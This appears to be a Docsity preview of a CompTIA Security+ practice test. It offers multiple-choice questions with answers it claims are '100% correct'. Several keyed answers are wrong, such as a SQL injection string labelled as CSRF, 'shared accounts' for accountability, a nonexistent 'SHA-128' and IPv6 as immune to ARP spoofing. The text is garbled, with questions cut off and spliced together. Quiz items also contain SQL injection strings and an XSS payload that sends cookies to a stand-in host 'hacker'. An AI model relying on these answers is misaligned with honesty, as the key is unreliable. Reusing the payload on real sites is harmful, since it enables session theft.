CompTIA Security+ Practice Test with 100% Correct Answers, Exams of Biology

A series of multiple-choice questions and answers related to comptia security+ certification. It covers various cybersecurity concepts, including network security, cryptography, incident response, and access control. Designed to help individuals prepare for the comptia security+ exam by providing practice questions and explanations for the correct answers.

Typology: Exams

2024/2025

Available from 11/02/2024

tutor-lee-1

Partial preview of the text

Download CompTIA Security+ Practice Test with 100% Correct Answers and more Exams Biology in PDF only on Docsity! CompTIA Security+ Practice Test with 100% correct answers During an assessment of a manufacturing plant, a security analyst finds several end-of-life programmable logic controllers, which have firmware that was last updated three years ago and known vulnerabilities. Which of the following BEST mitigates the risks associated with the PLC's? - answer Implement network segmentation to isolate the devices A user is attempting to view and older sent email, but is unable to open the email. Which of the following is the MOST likely cause? - answer The private certificate used to sign the email has expired An organization's Chief Information Officer recently received an email from human resources that contained sensitive information. The CIO noticed the email was sent via unsecure means. A policy has since been put into place stating all emails must be transmitted using secure technologies. Which of the following should be implemented to address the new policy? - answer TLS Which of the following is a penetration tester performing when running an SMB NULL session scan of a host to determine valid usernames and share names? - answer Credentialed vulnerability scan A Chief Executive Officer of an organization receives an email stating the CEO's account may have been compromised. The email further directs the CEO to click on a link to update the account credentials. Which of the following types of attacks has most likely occurred? - answer Pharming A user is unable to open a file that has a grayed-out icon with a lock. The user receives a pop-up message indicating that payment must be sent in Bitcoin to unlock the file. Later in the day, other users in the organization lose the ability to open files on the server. Which of the following has MOST likely occurred? 
(Select THREE) - answer Crypto-malware, Botnet attack, Ransomware authentication from within the United States anytime, Allow authentication if the user is accessing email or a shared file system, Do not allow authentication if the AV program is two days out of date, Do not allow authentication if the location of the device is in two specific countries, Given the requirements, which of the following mobile deployment authentication types is being utilized? - answer Context-aware authentication An organization has an account management policy that defines parameters around each type of account. The policy specifies different security attributes, such as longevity, usage auditing, password complexity, and identity proofing. The goal of the account management policy is to ensure the highest level of security while providing the greatest availability without compromising data integrity for users. Which of the following account types should the policy for service technicians from corporate partners? - answer Privileged user account Ann, a security administrator, wants to ensure credentials are encrypted in transit when implementing a RADIUS server for SSO. Which of the following are needed given these requirements? ( Select TWO) - answer Public key, Private key An employee has been writing a secure shell around software used to secure executable files. The employee has conducted the appropriate self-test and is ready to move the software into the next environment. Within which of the following environments is the employee currently working? - answer Test Which of the following occurs when a vulnerability scan fails to identify an existing vulnerability? - answer False negative A security technician is configuring a new access switch. The switch will be managed through software that will send status reports and logging details to a central management console. Which of the following protocols should the technician configure to BEST meet these requirements? 
(select TWO) - answer SNMPv3, Syslog A technician is evaluating malware that was found on the enterprise network. After reviewing samples of the malware binaries, the technician finds each has a different hash associated with it. Which of the following types of malware is MOST likely present in the environment? - answer Polymorphic worm Which of the following would be considered multifactor authentication? - answer Strong password and fingerprint Logs from an IDS alerted on a string entered into the company's website login page. The following line was pulled from the HTTP POST request. userid=bob' and 1='1&request=Submit Which of the following was attempted? - answer Cross-site request forgery Which of the following controls allows a security guard to perform a post-incident review? - answer Detective An energy company is in the final phase of testing its new billing service. The testing team wants to use production data in the test system for stress testing. Which of the following is the BEST way to use production data without sending false notification to the customers? - answer Backup and archive the production data to an external source A technician has installed an new AAA server, which will be used by the network team to control access to a company's routers and switches. The technician completes the configuration by adding the network team members to the NETWORK_TEAM group, and then adding the NETWORK_TEAM group to the appropriate ALLOW_ACCESS access list. Only members of the network team should have access to the company's routers and switches. NWTWORK_TEAM: Lee, Andrea, Pete ALLOW_ACCESS: DOMAIN_USERS, AUTHENTICATED_USERS, NETWORK_TEAM Members of the network team ability to log on to various network devices configured to use the AAA server. 
Weeks later, an auditor asks to review the following access log sample: 5/26/17 10:20 PERMIT: LEE Which of the following should needs to assure the head of the auditing department that the response came from the security analyst, and the contents of the response must be kept confidential. Which of the following are the LAST steps the security analyst should perform prior to electronically sending the message? (Select TWO) - answer Encrypt the message, Digitally sign the message A systems administrator is configuring a new network switch for TACACS+ management and authentication. Which of the following must be configured to provide authentication between the switch and the TACACS+ server? - answer Shared secret A security administrator wants to audit the login page of a newly developed web application to determine if default accounts have been disabled. Which of the following is BEST suited to perform this audit? - answer Banner grabbing An analyst generates the following color-coded table shown in the exhibit to help explain the risk of potential incidents in the company. The vertical axis indicates the likelihood of an incident, while the horizontal axis indicates the impact. Which of the following is this table an example of? - answer Qualitative risk assessment A bank is experiencing a DoS attack against an application designed to handle 500IP-based sessions. In addition, the perimeter router can only handle 1Gbps of traffic. Which of the following should be implemented to prevent a DoS attacks in the future? - answer Implement a forwarding proxy and URL filtering for the organization's applications Which of the following BEST explains why an application team might take a VM snapshot before applying patches in the production environment? 
- answer To reduce operational risk so the team can quickly restore the application to a previous working condition if the patch fails A penetration tester is assessing a large organization and obtains a valid set of basic user credentials from a compromised computer. Which of the following is the MOST likely to occur? - answer Impersonation A company wishes to move all of its services and applications to a cloud provider but wants to maintain full control of the deployment, access, and provisions of its services to its users. Which of the following BEST represents the required cloud deployment model? - answer Private A technician has discovered a crypto-virus infection on a workstation that has access to sensitive remote resources. Which of the following is the immediate NEXT step the technician should take? - answer Disable the network connections on the workstation Joe, a backup administrator, wants to implement a solution that will reduce the restoration time of physical servers. Which of the following is the BEST method for Joe to use? - answer Full A network technician must update the company's wireless configuration settings to comply with new requirements, which mandate the use of AES encryption. Which of the following settings would BEST ensure the requirements are met? - answer Configure CCMP Which of the following differentiates ARP poisoning from a MAC spoofing attack? - answer ARP poisoning uses unsolicited ARP replies A network administrator is downloading the latest software for the organization's core switch. The download page allows users to view the checksum values for the available files. The network administrator is shown the following when viewing the checksum values for the YB_16.swi file: After downloading the file, the network administrator runs a command to show the following output: Which of the following can be determined from the above output? 
- answer The downloaded file has been corrupted or tampered with A technician is evaluating malware that was found on the enterprise network. After reviewing samples of the malware binaries, the technician finds each has a different hash associated with it. Which of the following types of malware is MOST likely present in the environment? - answer Polymorphic worm Which of the following is a compensating control that will BEST reduce the risk of weak passwords? - answer Requiring the user of one-time tokens An employee is having issues when attempting to access files on a laptop. The machine was previously running slow, and many files were not accessible. The employee is not able to access the hard drive the next day, and all file names were changed to some random names. Which of the following BEST represents what compromised the machine? - answer Crypt-malware A network administrator receives a support ticket from the security operations team to implement secure access to the domain. The support contains the following information: Source: 192.168.1.137, Destination: 10.113.10.8, Protocol: TCP, Ports: 636, Time-of-day restriction: None, Proxy bypass required: Yes, Which of the following is being requested to be implemented? - answer LDAPS A security consultant is gathering information about the frequency of a security threat's impact to an organization. Which of the following should the consultant use to label the number of times an attack can be expected to impact the organization in a 365-day period? - answer ARO A user typically works remotely over the holidays, using a web-based VPN to access corporate resources. The user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely the cause? - answer The certificate has expired An organization wants to move its operations to the cloud. 
The organization's systems administrators will still maintain control of the servers, firewalls, and load balancers in the cloud environment. Which of the following models is the organization considering? - answer PaaS Management wishes to add another authentication factor in addition to fingerprints and passwords in order to have three-factor authentication. Which of the following would BEST satisfy this request? - answer Token fob A security analyst is assigned to perform a penetration test for one of the company's clients. During the scope discussion, the analyst is notified that the client is not going to share any information related to the environment to be tested. Which of the following BEST identifies this type of penetration testing? - answer Black box A CSIRT has completed restoration procedures related to a breach of sensitive data and is creating documentation used to improve future response activities and coordination among team members. Which of the following information would be MOST beneficial to include in lessons learned documentation? (Select TWO) - answer Details regarding system restoration activities completed during the response activity, Suggestions for potential areas of focus during quarterly training activites When considering IoT systems, which of the following represents the GREATEST ongoing risk after vulnerability has been discovered? - answer Tight integration to existing systems A company is executing a strategy to encrypt and sign all proprietary data in transit. The company recently deployed PKI services to support this strategy. Which of the following protocols supports the strategy and employs certificates generated by the PKI? (select THREE) - answer S/MIME, TLS, IPSec A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. 
Which of the following is the FIRST step the forensic expert needs to An organization is providing employees on the shop floor with computers that will log their time based on when they sign on and off the network. Which of the following account types should the employees receive? - answer User account A security administrator has replaced the firewall and notices a number of dropped connections. After looking at the data the security administrator sees the following information that was flagged as a possible issue: "SELECT*FROM" and '1'='1' Which of the following can the security administrator determine from this? - answer An SQL injection attack is being attempted A systems administrator has implemented multiple websites using host headers on the same server. The server hosts two websites that require encryption and other websites where encryption is optional. Which of the following should the administrator implement to encrypt web traffic for the required websites? - answer TLS host certificate A security administrator is investigating many recent incidents of credential theft for users accessing the company's website, despite the hosting web server requiring HTTPS for access. The server's logs show the website leverages the HTTP POST method for carrying user authentication details. Which of the following is the MOST likely reason for compromise? - answer The HTTP POST method is not protected by HTTPS A technician is investigating a potentially compromised device with the following symptoms: Browser slowness , frequent browser crashes, hourglass stuck, new search toolbar and increased memory consumption. Which of the following types of malware has infected the system? - answer Man-in-the-browser A penetration testing deploys a specifically crafted payload to a web server, which results in opening a new session as the web server daemon. This session has full read/write access to the file system and the admin console. 
Which of the following BEST describes the attack? - answer Injection A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the NEXT step the team should take? - answer Perform a containment procedure by disconnecting the server "pull the plug" A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of types of scans MOST likely caused the outage? - answer Intrusive credentialed scan An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the BEST solutions for the organization? (Select TWO) - answer TACACS+, RADIUS After a security assessment was performed on the enterprise network, it was discovered that: 1. Configuration changes have been made by users without the consent of IT 2. Network congestion has increased due to the use of social media 3. Users are accessing file folders and network shares that are beyond the scope of their need to know. Which of the following BEST describes the vulnerabilities that exist in this environment? (Select TWO) - answer Poorly trained users, Improperly configured accounts A security analyst is performing a BIA. The analyst notes that in a disaster, failover systems must be up and running within 30 minutes. The failover systems must use backup data that is no older than one hour. Which of the following should the analyst include in the business continuity plan? - answer A maximum RPO of 60 minutes Which of the following terms BEST describes an exploitable vulnerability that exists but has not been publicly disclosed yet? - answer Zero-day credentials. 
After investigating, it seems the application has allowed some users to bypass authentication of that application. Which of the following types of malware allow such a compromise to take place? (Select TWO) - answer RAT, Backdoor Which of the following is a major difference between XSS attacks and remote code exploits? - answer XSS attacks use machine language, while remote exploits use interpreted language A highly complex password policy has made it nearly impossible to crack account passwords. Which of the following might a hacker still be able to perform? - answer Pass-the-hash attack A security administrator wants to determine if a company's web servers have the latest operating system and application patches installed. Which of the following types of vulnerability scans should be conducted? - answer Credentialed Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data? - answer Symmetric algorithm A security analyst is assessing a small company's internal servers against recommended security practices. Which of the following should the analyst do to conduct the assessment? (select Two) - answer Review the company's current security baseline, Run an expoitation framework to confirm vulnerabilities To help prevent one job role from having sufficient access to create, modify, and approve payroll data, which of the following practices should be employed? - answer Separation of duties Which of the following is used to encrypt web application data? - answer AES Which of the following are used to increase the computation time required to crack a password? (Select Two) - answer BCRYPT, PBKDF2 Which of the following is a compensating control that will BEST reduce the risk of weak passwords? - answer Requiring the use of one-time tokens A recent penetration test revealed several issues with a public-facing website used by customers. 
The testers were able to Enter long lines of code and special characters; crash the system; gain unauthorized access to the internal application server and map the internal network. The development team has stated they will need to rewrite a significant portion of the codeused, and it will take more than a year to deliver the finished product. Which of the following would be the BEST solution to introduce in the interim? - answer UTM An employee in the finance department receives an email which appears to come from the CFO, instructing the employee to immediately wire a large sum of money to a vendor. Which of the following BEST describes the principles of social engineering used? (select TWO) - answer Urgency, Authority Students at a residence hall are reporting internet connectivity issues. The university's network administrator configured the residence hall's network to provide public IP addresses to all connected devices, but many student devices are receiving private IP addresses due to rogue devices. The network administrator verifies the residence hall's network is correctly configured and contacts the security administrator for help. Which of the following configurations should the security administrator suggest for implementation? - answer Router ACLs A law office has been leasing dark fiber from a local telecommunications company to connect a remote office to company headquarters. The telecommunications company has decided to discontinue its dark fiber product and is offering an MPLS connection, which the law office TO:ANY PORT:80, 20 PERMIT FROM:ANY TO:ANY PORT:443, 30 DENY FROM: ANY TO:ANY PORT:ANY. Which of the following is the MOST secure solution the security administrator can implement to fix this issue? - answer Replace rule number 10 with the following rule 10 PERMIT FROM:ANY TO:ANY PORT:22 An organization electronically processes sensitive data within a controlled facility. The CISO wants to limit signal from leave the facility. 
Which of the following mitigates this risk? - answer Hardening the facility with a Faraday cage to contain emissions produced from data processing An organization wants to upgrade its enterprise-wide desktop computer solution. The organization currently has 500 PCs active on the network. The CISO suggests that the organization employ desktop imaging technology for such a large-scale upgrade. Which of the following is a security benefit of implementing an imaging solution? - answer It provides a consistent baseline A security analyst is doing a vulnerability assessment on a database server. A scanning tool returns the following information: Database: CustomerAccess1 Columns: Password Data type: MD5 Hash Salted?: No.. There have been several security breaches on the web server that accesses this database. The security team is instructed to mitigate the impact of any possible breaches. The security team is also instructed to improve the security on this database by making it less vulnerable to offline attacks. Which of the following would BEST accomplish these goals? (Select TWO) - answer Generate password hashes using SHA-256, Require the web server to only use TLS 1.2 encryption While investigating a virus infection, a security analyst discovered the following on an employee laptop; Multiple folders containing a large number of newly released movies and music files, proprietary company data, a large amount of PHI data, unapproved FTP software and Documents that appear to belong to a competitor. Which of the following should the analyst do FIRST? - answer Contact the legal and compliance department for guidance An attacker exploited a vulnerability on a mail server using the code: <HTML><body onload=document.location.replace (*http://hacker/post.asp?victim&message =" + document.cookie + "<br>" + "URL:" +"document.location) ;/> </body> <HTML>. Which of the following BEST explains what the attacker is doing? 
- answer The attacker is replacing a document A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the NEXT step the team should take? - answer Perform a containment procedure by disconnecting the server A CISO asks the security architect to design a method for contractors to access the company's internal network securely without allowing access to systems beyond the scope of their project. Which of the following methods would BEST fit the needs of the CISO? - answer VDI When attackers use a compromised host as a platform for launching attacks deeper into a company's network it is said that they are: - answer Pivoting A security analyst is implementing PKI-based functionality to a web application that has the following requirements: File contains certificate information, Certificate chains, Root authority certificates and Private key. All of these components will be part of one file and cryptographically protected with a password. Given this scenario, which of the following certificate types should the analyst implement to BEST meet these requirements? - answer .pfx certificate Which of the following penetration testing concepts is an attacker MOST interested in when placing the path of a malicious file in the windows/CurrentVersion/Run registry key? - answer Active reconnaissance An incident response analyst in a corporate security operations center receives a phone call from an SOC analyst. The SOC analyst explains the help desk recently reimaged a workstation that was suspected of being infected with an unknown type of malware, however, even after reimaging, the host continued to generate SIEM alerts. Which of the following types of malware is MOST likely responsible for producing the SIEM alerts? 
- answer Rootkit Which of the following is the BEST way for home users to mitigate vulnerabilities associated with IoT devices on their home networks? - answer Apply firmware and software updates upon availability During a lessons learned meeting regarding a previous incident , the security team receives a follow-up action item with the following requirements: Allow authentication from within the United States anytime, Allow authentication if the user is accessing email or a shared file system, Do not allow authentication if the AV program is two days out of date, Do not allow authentication if the location of the device is in two specific countries, Given the requirements, which of the following mobile deployment authentication types is being utilized? - answer Context-aware authentication A penetration tester has written an application that performs a bit-by-bit XOR 0xFF operation on binaries prior to transmission over un-trusted media. Which of the following BEST describes the action performed by this type of application? - answer Obfuscation A company wants to ensure confidential data storage media is sanitized in such a way that the drive cannot be reused. Which of the following methods should the technician use? - answer Shredding A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using? - answer Banner grabbing Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS? - answer Privilege escalation When developing an application, executing a preconfigured set of instructions is known as: - answer A stored procedure A network administrator needs to allocate a new network for the R&D group. The network must not be accessible from the internet, regardless of the network firewall or other external misconfigurations. 
Which of the following settings should the network administrator implement to accomplish this? - answer Configure the OS default TTL to 1 An application was recently compromised after some malformed data came in via a web form. Which of the following would MOST likely have prevented this? - answer Input validation When attackers use a compromised host as a platform for launching attacks deeper into a company's network, it is said that they are: - answer Pivoting A new Chief Information Officer has been reviewing the badging procedures and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes this policy? - answer Administrative Which of the following refers to the term used to restore a system to its operational state? - answer MTTR A security administrator must implement a network that is immune to ARP spoofing attacks. Which of the following should be implemented to ensure that a malicious insider will not be able to successfully use ARP spoofing techniques? - answer IPv6 Which system should you implement if you want to create a file system access control model where you can label files as "Secret", Confidential", "Restricted", or "Unclassified"? - answer Trusted OS Bob, an employee, was escorted from the company premises due to suspicion of revealing trade secrets to a competitor. Bob had already been working for two hours before leaving the premises. A security technician was asked to prepare a report of files that had changed since last night's integrity scan. Which of the following could the technician use to prepare the report? (Select TWO). - answer MD5, HMAC Which is the hardest to crack and requires both parties to exchange the encryption key before communicating? - answer One-time pads Bob needs to send Sally a digitally signed and encrypted email. Which algorithms and keys is used to complete these actions? 
- answer Sally's public key to encrypt using 3DES, Bob's private key to sign using SHA In order to digitally sign your emails with PGP, what needs to be created first? - answer A public and private key A company wants to improve its overall security posture by deploying environmental controls in its datacenter. Which of the following is considered an environmental control that can be deployed to meet this goal? - answer Proximity readers Ann, a security administrator, is strengthening the security controls of the company's campus. Her goal is to prevent people from accessing open locations that are not supervised, such as around the receiving dock. She is also concerned that employees are using these entry points as a way of bypassing the security guard at the main entrance. Which of the following should Ann recommend that would BEST address her concerns? - answer Build fences around campus with gate entrances A security administrator is notified that users attached to a particular switch are having intermittent connectivity issues. Upon further research, the administrator finds evidence of an ARP spoofing attack. Which of the following could be utilized to provide protection from this type of attack? - answer Configure flood guards on the switch A software security concern when dealing with hardware and devices that have embedded software or operating systems is: - answer The vendor may not have a method for installation of patches Ann a technician received a spear-phishing email asking her to update her personal information by clicking the link within the body of the email. Which of the following type of training would prevent Ann and other employees from becoming victims to such attacks? - answer Personal identifiable information Which of the following is a step in deploying a WPA2- Enterprise wireless network? - answer Install a digital certificate on the authentication server Which of the following can be provided to an AAA system for the identification phase? 
- answer Username A security administrator is notified that users attached to a particular switch are having intermittent connectivity issues. Upon further research, the administrator finds evidence of an ARP spoofing attack. Which of the following could be utilized to provide protection from this type of attack? - answer Configure flood guards on the switch The Chief Information Security Officer is concerned that users could bring their personal laptops to work and plug them directly into the network ports under their desks. Which of the following should be configured on the network switch to prevent this from happening? - answer Port security A small company has recently purchased cell phones for managers to use while working outside of the office. The company does not currently have a budget for mobile device management and is primarily concerned with deterring leaks of sensitive information obtained by unauthorized access to unattended phones. Which of the following would provide the solution that BEST meets the company's requirements? - answer Screen lock Which of the following technologies would be MOST appropriate to utilize when testing a new software patch before a company-wide deployment? - answer Virtualization Which of the following would an attacker use to generate and capture additional traffic prior to performing an IV attack? - answer Dictionary attack An administrator wants to establish a WiFi network using a high gain directional antenna with a narrow radiation pattern to connect two buildings separated by a very long distance. Which of the following antennas would be BEST for this situation? - answer Yagi Joe, the system administrator, has been asked to calculate the Annual Loss Expectancy (ALE) for a $5,000 server, which often crashes. In the past year, the server has crashed 10 times, requiring a system reboot to recover with only 10% loss of data or function. Which of the following is the ALE of this server? 
- answer $500

Which of the following can be used to ensure that sensitive records stored on a backend server can only be accessed by a front-end server with the appropriate record key?
- answer File encryption

A system administrator is configuring UNIX accounts to authenticate against an external server. The configuration file asks for the following information: DC=ServerName and DC=COM. Which of the following authentication services is being used?
- answer LDAP

Which of the following is an XML-based open standard used in the exchange of authentication and authorization information between different parties?
- answer SAML

Which of the following is an authentication method that can be secured by using SSL?
- answer LDAP

Ann, a member of the Sales Department, has been issued a company-owned laptop for use when traveling to remote sites. Which of the following would be MOST appropriate when configuring security on her laptop?
- answer Configure the laptop with a BIOS password

An overseas branch office within a company has many more technical and non-technical security incidents than other parts of the company. Which of the following management controls should be introduced to the branch office to improve their state of security?
- answer Continuous security monitoring process

Which of the following can be used to maintain a higher level of security in a SAN by allowing isolation of misconfigurations or faults?
- answer VSAN

A company determines a need for additional protection from rogue devices plugging into physical ports around the building. Which of the following provides the highest degree of protection from unauthorized wired network access?
- answer 802.1x

Virtualization would provide an ROI when implemented under which of the following situations?
- answer Multiple existing but underutilized physical servers

An administrator wants to restrict traffic between two VLANs. The network devices connecting the two VLANs are layer 3 switches.
Which of the following should the admin configure?
- answer ACL

Which of the following is susceptible to an attack that can obtain the wireless password by brute-forcing a 4-digit PIN followed by a 3-digit PIN?
- answer WPS

A server administrator is investigating a breach and determines an attacker modified the application log to obscure the attack vector. During the lessons-learned activity, the facilitator asks for a mitigation response to protect the integrity of the logs should a similar attack occur. Which of the following mitigations would be MOST appropriate to fulfill the requirement?
- answer Enterprise SIEM

In order to comply with new auditing standards, a security administrator must be able to complete system security alert logs directly with the employee who triggers the alert. Which of the following should the security administrator implement in order to meet this requirement?
- answer Elimination of shared accounts

An employee is using company time and assets to use a third-party tool to share downloadable media with other users around the world. Sharing downloadable media is not expressly forbidden in the company security policy or acceptable use policy. Which of the following BEST describes what the security staff should consider adding to these policies?
- answer P2P

The network administrator wants to assign VLANs based on which user is logging into the network. Which of the following should the administrator use to accomplish this? (Select TWO)
- answer MAC filtering, 802.1x

A company implemented a public-facing authentication system that uses PKI and extended attributes to allow third-party, web-based application integration. This is an example of which of the following? (Select THREE)
- answer Federation, Two-factor authentication, Single sign-on

An employee connects to a public wireless hotspot during a business trip. The employee attempts to go to a secure website but instead connects to an attacker who is performing a MITM attack.
Which of the following should the employee do to mitigate the vulnerability described in the scenario?
- answer Connect to a VPN when using public wireless networks

Joe, a security administrator, recently configured a method of secure access for remote administration of network devices. When he attempts to connect to an access layer switch in the organization from outside the network, he is unable to successfully connect. Which of the following ports should be open on the firewall for Joe to successfully connect to the switch?
- answer TCP 161

During an audit of a software development organization, an auditor finds the organization did not properly follow industry best practices, including peer review and board approval, prior to moving applications into the production environment. The auditor recommends adopting a formal process incorporating these steps. To remediate the finding, the organization implements:
- answer Change management

Two companies are partnering to bid on a contract. Normally these companies are fierce competitors, but for this procurement they have determined that a partnership is the only way they can win the job. Both companies are concerned about unauthorized data sharing and want to ensure other divisions within each company will not have access to proprietary data. To best protect against unauthorized data sharing they should each sign a:
- answer BPA

A recent network audit revealed several devices on the internal network were not running antivirus or HIPS. Upon further investigation, it was discovered that these devices were new laptops that were deployed without installing the end-point protection suite used by the company. Which of the following could be used to mitigate the risk of authorized devices that are unprotected residing on the network?
- answer MAC filtering

Ann is attempting to send a digitally signed message to Joe. Which of the following should Ann do?
- answer Encrypt a certificate signing request with her private key

compared, the analyst must use an algorithm that is known to have the lowest collision rate. Which of the following should be selected?
- answer SHA-128

John wants to secure an 802.11n network. Which of the following encryption methods would provide the highest level of protection?
- answer WPA2 with AES

Which of the following is the MOST influential concern that contributes to an organization's ability to extend enterprise policies to mobile devices?
- answer Support of mobile OS

Which of the following MUST be implemented to ensure accountability?
- answer shared accounts

Which of the following attack types is MOST likely to cause damage or data loss for an organization and be difficult to investigate?
- answer DDoS

The remote branch of an organization has been assigned two public IP addresses by an ISP. The organization has ten workstations and a wireless router. Which of the following should be deployed to ensure that all devices have internet access?
- answer Port Address Translation (PAT)

A security administrator wishes to perform authentication, authorization, and accounting, but does not wish to use a proprietary protocol. Which of the following services would fulfill these requirements?
- answer TACACS+

Which of the following is the FASTEST method to disclose one-way hashed passwords?
- answer Rainbow tables